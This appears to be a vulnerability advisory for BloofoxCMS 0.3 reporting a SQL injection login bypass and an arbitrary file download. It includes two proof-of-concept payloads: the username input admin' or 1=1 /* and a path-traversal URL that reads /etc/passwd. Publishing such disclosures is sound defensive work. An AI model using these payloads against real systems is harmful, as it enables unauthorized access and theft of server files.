vendor:
BloofoxCMS
by:
AmnPardaz Security Research Team
7.5
CVSS
HIGH
SQL Injection (Authentication bypass) , Source code disclosure
89
CWE
Product Name: BloofoxCMS
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Remote with browser
N/A
Bloofox CMS Vulnerabilities
BloofoxCMS is a free open source content management system (CMS). There is no input validation here therefore its possible for a remote attacker to bypass login mechanism when magic quotes is disabled! POC : Username: admin' or 1=1 /* Password: something It is possible to download any file from server by using this script. POC : http://www.example.com/file.php?file=../../../../../../../../../etc/passwd
Mitigation:
Input validation should be done to prevent SQL injection attacks.